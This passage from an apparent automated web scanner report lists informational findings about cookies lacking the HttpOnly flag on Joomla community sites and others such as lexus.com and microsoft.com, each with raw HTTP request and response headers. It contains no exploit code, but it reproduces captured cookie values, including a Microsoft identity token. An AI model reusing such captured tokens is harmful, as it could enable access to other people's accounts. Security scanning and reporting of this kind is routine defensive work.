71961420e1faf09c5b938fb398f13f9d=f1c7cc8ce03b201034ffdeab744b7845; path=/
afuj-template_tpl=afuj-template; expires=Sat, 14-Jan-2012 15:57:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /les-news-joomla/13-news-officielles/1032-joomla-1-6 HTTP/1.1
Host: www.joomla.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 71961420e1faf09c5b938fb398f13f9d=f1c7cc8ce03b201034ffdeab744b7845; path=/
Set-Cookie: afuj-template_tpl=afuj-template; expires=Sat, 14-Jan-2012 15:57:53 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 15:57:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20171

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<ht
...[SNIP]...

14.770. http://www.joomla.gr/--46/93-joomla-1-6/447-joomla-new-1-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.gr
Path:	/--46/93-joomla-1-6/447-joomla-new-1-6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c0680a25a7d50af5bbee3643e0254219=a232897d27119dcf55e1ca99d18ca2fc; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /--46/93-joomla-1-6/447-joomla-new-1-6 HTTP/1.1
Host: www.joomla.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: c0680a25a7d50af5bbee3643e0254219=a232897d27119dcf55e1ca99d18ca2fc; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr" >
<h
...[SNIP]...

14.771. http://www.joomla.it/notizie/4691-e-arrivato-joomlar-160.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.it
Path:	/notizie/4691-e-arrivato-joomlar-160.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

9ceb0f1becdca810c0080330d5ccb5f5=b5f02fcebb7f5e7d0e462177081c5aff; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /notizie/4691-e-arrivato-joomlar-160.html HTTP/1.1
Host: www.joomla.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: User-Agent,Accept,Accept-Encoding
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9ceb0f1becdca810c0080330d5ccb5f5=b5f02fcebb7f5e7d0e462177081c5aff; path=/
Last-Modified: Mon, 24 Jan 2011 16:05:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-it" lang="it-it" >
<h
...[SNIP]...

14.772. http://www.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.joomla.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01; path=/
Last-Modified: Mon, 24 Jan 2011 02:20:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 46035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.773. http://www.joomla.org/16/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org
Path:	/16/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

0c293deadc13e094debc5ff2622f129c=32c8df9d491ff8e9baed7f318c4c18f3; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /16/ HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0c293deadc13e094debc5ff2622f129c=32c8df9d491ff8e9baed7f318c4c18f3; path=/
Last-Modified: Mon, 24 Jan 2011 02:22:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://www
...[SNIP]...

14.774. http://www.joomla.org.hu/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org.hu
Path:	/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

a3c8e20ef07ced04de7a742c67ea7041=c47f7e47ae59d11b65fa8cc931aa7381; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla/46-kiadasok/272-megerkezett-a-joomla-16.html HTTP/1.1
Host: www.joomla.org.hu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a3c8e20ef07ced04de7a742c67ea7041=c47f7e47ae59d11b65fa8cc931aa7381; path=/
Set-Cookie: juah_tpl=juah; expires=Sat, 14-Jan-2012 15:12:03 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 15:12:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hu-hu" lang="hu-hu">
...[SNIP]...

14.775. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org.tw
Path:	/news/joomla-official-news/163-joomla16-arrived

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.776. http://www.joomla.ro/component/content/article/1-lansari/55-a-aparut-joomla-16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.ro
Path:	/component/content/article/1-lansari/55-a-aparut-joomla-16

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

0c17e6df7eeb8e50e6f6c79b91bcb8d6=8907c23320caff3200df60ba86a0f9cc; path=/
JRomania_tpl=JRomania; expires=Sat, 14-Jan-2012 15:15:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /component/content/article/1-lansari/55-a-aparut-joomla-16 HTTP/1.1
Host: www.joomla.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:28 GMT
Server: Apache/2.2.11 (Mandriva Linux/PREFORK-10.10mdv2009.1)
X-Powered-By: PHP/5.2.14
Set-Cookie: 0c17e6df7eeb8e50e6f6c79b91bcb8d6=8907c23320caff3200df60ba86a0f9cc; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: JRomania_tpl=JRomania; expires=Sat, 14-Jan-2012 15:15:28 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:15:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ro-ro" lang="ro-ro">

<
...[SNIP]...

14.777. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlacommunity.eu
Path:	/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.778. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlacorner.com
Path:	/joomla-news/608-joomla-16-has-arrived.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.779. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlainorge.no
Path:	/nyheter/joomla/552-joomlar-16-er-utgitt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nyheter/joomla/552-joomlar-16-er-utgitt HTTP/1.1
Host: www.joomlainorge.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.780. http://www.joomlapt.com/comunidade-joomlapt/139-joomla-16-ja-chegou.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlapt.com
Path:	/comunidade-joomlapt/139-joomla-16-ja-chegou.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

d4dad6935f632ac35975e3001dc7bbe8=ojepc2gnaddk51l2fk130dsb57; path=/
ja_social_tpl=ja_social; expires=Sat, 14-Jan-2012 15:55:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /comunidade-joomlapt/139-joomla-16-ja-chegou.html HTTP/1.1
Host: www.joomlapt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=ojepc2gnaddk51l2fk130dsb57; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_social_tpl=ja_social; expires=Sat, 14-Jan-2012 15:55:51 GMT; path=/
Expires:
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org
...[SNIP]...

14.781. http://www.jt.gen.tr/makaleler/46-joomla-16.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jt.gen.tr
Path:	/makaleler/46-joomla-16.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

619eb53f4a8cd392a6fe48a16c891436=63427cbf922f139568c46da3ddcb18be; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /makaleler/46-joomla-16.html HTTP/1.1
Host: www.jt.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 619eb53f4a8cd392a6fe48a16c891436=63427cbf922f139568c46da3ddcb18be; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-tr" lang="tr-tr" >
<he
...[SNIP]...

14.782. http://www.kwitco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kwitco.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

exp_last_visit=980592161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
exp_last_activity=1295952161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kwitco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: exp_last_visit=980592161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
Set-Cookie: exp_last_activity=1295952161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Last-Modified: Tue, 25 Jan 2011 04:42:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 8240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Kwittk
...[SNIP]...

14.783. http://www.lexus.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lexus.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=204.245.162.37.78011295930564514; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lexus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=173136
Expires: Thu, 27 Jan 2011 04:48:20 GMT
Date: Tue, 25 Jan 2011 04:42:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=204.245.162.37.78011295930564514; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/
Content-Length: 51157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<tit
...[SNIP]...

14.784. http://www.linkagogo.com/go/AddNoPopup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.785. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

2d3002958ebe475c6a8e5c841c44742a=ab02d207ed15eb2c3afc574ced1efe67; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.786. http://www.livejournal.com/update.bml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/update.bml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.787. http://www.lynda.com/landing/softwaretraining.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=KWWVWPSw4CYMO; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.788. http://www.microsoft.com/web/joomla/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/web/joomla/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/joomla/ HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE8
Set-Cookie: WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
VTag: 791249211700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:01:36 GMT
Content-Length: 103075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head
...[SNIP]...

14.789. http://www.myride.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myride.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cweb=JONQJVS10.4.128.192CKMMI; path=/
USER_UUID_VCH=48FF47EA%2DCE8D%2DEABF%2D0FDF88CEC9C9E345;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
TIME=%7Bts%20%272011%2D01%2D24%2016%3A07%3A26%27%7D;path=/
TIME=%7Bts%20%272011%2D01%2D24%2020%3A08%3A26%27%7D;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
ID=27821%3BRIDE;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.myride.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.790. http://www.newsvine.com/_wine/save previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_wine/save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_wine/save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.791. http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nexternal.com
Path:	/ecommerce/joomla-shopping-cart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

homepagelog%5Fid=16003527; expires=Tue, 08-Jan-2013 08:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/joomla-shopping-cart.asp?source=google/ HTTP/1.1
Host: www.nexternal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.792. http://www.noreastermagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.noreastermagazine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.793. http://www.omniture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
